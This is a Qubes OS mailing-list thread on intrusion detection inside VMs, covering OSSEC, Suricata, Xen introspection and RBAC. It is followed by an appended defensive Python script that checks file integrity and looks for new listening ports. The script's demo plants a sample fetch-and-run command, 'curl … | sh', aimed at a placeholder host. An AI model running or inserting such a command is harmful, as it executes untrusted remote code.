Intrusion detection daemons in VMs


migue...@gmail.com

Nov 3, 2016, 6:42:21 PM
to qubes-users
Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA

I am interested, does anyone run intrusion detection tools within their VMs?

I use OSSEC [1] extensively elsewhere (on servers), but I am not sure it would work so well in the agent-server model in Qubes.

'local' mode would work, but I would still want to get notifications of events/attacks, even from vaulted VMs that can't send email.

Since the Qubes design suggests we should expect VM compromise, I think it makes sense to have something looking for such a compromise rather than just periodically rebuilding my VMs (as I currently do).

Anyone else looked into a nice solution?

[1] http://ossec.github.io

Zrubi

Nov 4, 2016, 5:35:14 AM
to migue...@gmail.com, qubes-users
On 11/03/2016 11:42 PM, migue...@gmail.com wrote:
> Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
>
> I am interested, does anyone run intrusion detection tools within their VMs?

Intrusion/virus detection inside the affected VM does not really make sense.

However, newer Xen versions have a nice feature:
https://wiki.xenproject.org/wiki/Virtual_Machine_Introspection

And already a real project using this feature:
https://drakvuf.com/


That feature would really make sense and would fit the Qubes philosophy
pretty nicely.


Another - currently implementable - way is to use a proxy VM (as it is
currently used as a dnf/yum proxy) and install your desired intrusion
detection software there.
Suricata is a good candidate for such a thing:
https://suricata-ids.org/

(I would just need more time and more RAM to play with such things ;)

--
Zrubi


7v5w7go9ub0o

Nov 4, 2016, 11:36:27 AM
to qubes...@googlegroups.com


On 11/04/2016 09:35 AM, Zrubi wrote:
> On 11/03/2016 11:42 PM, migue...@gmail.com wrote:
>> Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
>>
>> I am interested, does anyone run intrusion detection tools within their VMs?
> Intrusion/virus detection inside the affected VM does not really make sense.


Please consider a mail client/VM. Something could get into the user
space extensions and simply monitor mail while gathering account
information - working temporarily while hoping that the infection would
be saved and re-used in future sessions (an argument for never using
mail client internal browsers, and for always running WAN-apps in DispVMs)



>
> However, newer Xen versions have a nice feature:
> https://wiki.xenproject.org/wiki/Virtual_Machine_Introspection
>
> And already a real project using this feature:
> https://drakvuf.com/
>
>
> That feature would really make sense and would fit the Qubes philosophy
> pretty nicely.
>
>
> Another - currently implementable - way is to use a proxy VM (as it is
> currently used as a dnf/yum proxy) and install your desired intrusion
> detection software there.
> Suricata is a good candidate for such a thing:
> https://suricata-ids.org/
>
> (I would just need more time and more RAM to play with such things ;)
>


Yet another possibility is using Grsecurity RBAC. "Train" your VM RBAC
rules for normal operation for a day, then turn on enforcing mode and
block/flag any system or user actions that are exceptional. (RBAC can
easily be programmed to allow access only to specific, authorized net
addresses - perhaps easier than devising an iptables-adjusting script)

This RBAC protection is an optional part of the standard kernel
hardening patch.

IIRC other kernel hardening software has something similar to RBAC.


Andrew David Wong

Nov 4, 2016, 10:09:37 PM
to Zrubi, qubes-users

On 2016-11-04 02:35, Zrubi wrote:
> On 11/03/2016 11:42 PM, migue...@gmail.com wrote:
>> Coming out of a discussion in https://groups.google.com/forum/#!topic/qubes-users/hs2yapPlUVA
>>
>> I am interested, does anyone run intrusion detection tools within their VMs?
>
> Intrusion/virus detection inside the affected VM does not really make sense.
>
> However, newer Xen versions have a nice feature:
> https://wiki.xenproject.org/wiki/Virtual_Machine_Introspection
>
> And already a real project using this feature:
> https://drakvuf.com/
>
>
> That feature would really make sense and would fit the Qubes philosophy
> pretty nicely.
>

Very interesting. Tracking it here:

https://github.com/QubesOS/qubes-issues/issues/2417

--
Andrew David Wong (Axon)
Community Manager, Qubes OS
https://www.qubes-os.org

migue...@gmail.com

Nov 5, 2016, 12:16:12 AM
to qubes-users, migue...@gmail.com
On Friday, November 4, 2016 at 8:35:14 PM UTC+11, Laszlo Zrubecz wrote:
> Another - currently implementable - way is to use a proxy VM (as it is
> currently used as a dnf/yum proxy) and install your desired intrusion
> detection software there.
> Suricata is a good candidate for such a thing:
> https://suricata-ids.org/

If I view a malicious jpeg image on a site that drops malware onto my browsing VM, I want to know about that. Quite possible that a proxyVM would not help me here if it doesn't match some known signature. That sounds more like intrusion *prevention* than detection (though I know Suricata does both).

Something like OSSEC might, however, tell me that some new file exists or existing file has changed in some unexpected way, or that a new service has started listening on a port (whether or not the Qubes firewall is blocking). The knowledge is what matters to me most.

Anyway thanks - I know of many of the products out there, just was interested to hear if anyone had implemented on their Qubes in practice.

Cheers

Zrubi

Apr 24, 2017, 6:04:54 AM
to qubes...@googlegroups.com

On 11/04/2016 10:35 AM, Zrubi wrote:

> Another - currently implementable - way is to use a proxy VM (as it
> is currently used as a dnf/yum proxy) and install your desired
> intrusion detection software there. Suricata is a good candidate
> for such a thing: https://suricata-ids.org/
>
> (I would just need more time and more RAM to play with such things
> ;)

And finally now I have enough RAM, and got some time too :)
Here is the result:

http://zrubi.hu/en/2017/traffic-analysis-qubes/



Any comments and/or suggestions are welcome.

--
Zrubi

cyrinux

Apr 24, 2017, 8:49:58 AM
to qubes-users, migue...@gmail.com
Thanks man, you made my day. I have already done that, but without notification; a great improvement for me.

Chris Laprise

Apr 24, 2017, 12:54:37 PM
to Zrubi, qubes...@googlegroups.com
On 04/24/2017 06:04 AM, Zrubi wrote:
> On 11/04/2016 10:35 AM, Zrubi wrote:
>
>> Another - currently implementable - way is to use a proxy VM (as it
>> is currently used as a dnf/yum proxy) and install your desired
>> intrusion detection software there. Suricata is a good candidate
>> for such a thing: https://suricata-ids.org/
>>
>> (I would just need more time and more RAM to play with such things
>> ;)
>
> And finally now I have enough RAM, and got some time too :)
> Here is the result:
>
> http://zrubi.hu/en/2017/traffic-analysis-qubes/

Thanks for the guide; I will have to try it soon.

I may add a detection mechanism for file changes in my VM hardening project:

https://github.com/tasket/Qubes-VM-hardening/issues/4

The checks would occur before private.img is mounted as /rw.


--

Chris Laprise, tas...@openmailbox.org
https://twitter.com/ttaskett
PGP: BEE2 20C5 356E 764A 73EB 4AB3 1DC4 D106 F07F 1886
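The host-side checks discussed in this thread (migue...'s wish to learn that a new file appeared, an existing file changed, or a new service started listening on a port, and Chris's idea of checking the private image before it is mounted as /rw), as an added example that is not part of the thread, of OSSEC, of Suricata or of the Qubes-VM-hardening project. It is a small Python script that hashes every regular file under a root directory, diffs two such baselines, and parses /proc/net/tcp text for sockets in LISTEN state. It assumes it is run inside the VM (or pointed at a separately mounted private image as the root directory); the /proc/net/tcp lines and the temporary directory contents are constructed for the demonstration.

```python
import hashlib
import os
import tempfile

# TCP_LISTEN as it appears in the "st" column of /proc/net/tcp and /proc/net/tcp6
LISTEN_STATE = "0A"

# Constructed sample of /proc/net/tcp: DNS on 127.0.0.1:53 and an unexpected
# listener on 0.0.0.0:8080 (0x1F90), plus one ESTABLISHED connection (state 01).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10001 1 0000000000000000 100 0 0 10 0
   1: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 10002 1 0000000000000000 100 0 0 10 0
   2: 0B000A0A:D3C4 5DB8D822:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 10003 1 0000000000000000 20 4 30 10 -1
"""


def hash_file(path):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root):
    """Map of path (relative to root) -> sha256 for every regular file under root.
    Symlinks are skipped so a hostile link cannot make the scan read outside root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            result[os.path.relpath(full, root)] = hash_file(full)
    return result


def diff_baseline(old, new):
    """Compare two baselines and report added, removed and changed paths."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return {"added": added, "removed": removed, "changed": changed}


def listening_ports(proc_net_tcp_text):
    """Parse /proc/net/tcp (or tcp6) text; return the set of local ports in LISTEN state.
    The local_address column is hex 'ADDR:PORT', so the port is parsed base 16."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        if state == LISTEN_STATE:
            ports.add(int(local_addr.rsplit(":", 1)[1], 16))
    return ports


def new_listeners(known_ports, proc_net_tcp_text):
    """Ports listening now that were not in the known-good set."""
    return sorted(listening_ports(proc_net_tcp_text) - set(known_ports))


def demo():
    """Constructed scenario: baseline a directory, then simulate a dropper that
    appends to .bashrc and adds an autostart entry. Returns the diff."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "home/user/.config/autostart"))
        with open(os.path.join(root, "home/user/.bashrc"), "w") as f:
            f.write("alias ll='ls -l'\n")
        before = baseline(root)
        with open(os.path.join(root, "home/user/.bashrc"), "a") as f:
            f.write("curl -s http://example.invalid/x | sh\n")  # constructed payload line
        with open(os.path.join(root, "home/user/.config/autostart/update.desktop"), "w") as f:
            f.write("[Desktop Entry]\nExec=/tmp/.x\n")
        after = baseline(root)
        return diff_baseline(before, after)


if __name__ == "__main__":
    print("file changes:", demo())
    print("unexpected listeners:", new_listeners({53}, SAMPLE_PROC_NET_TCP))
```

In practice the "before" baseline would be stored outside the VM being checked (dom0 or a vault-type VM) and the "after" scan pointed at the private image mounted read-only, since a baseline kept inside a compromised VM can simply be rewritten.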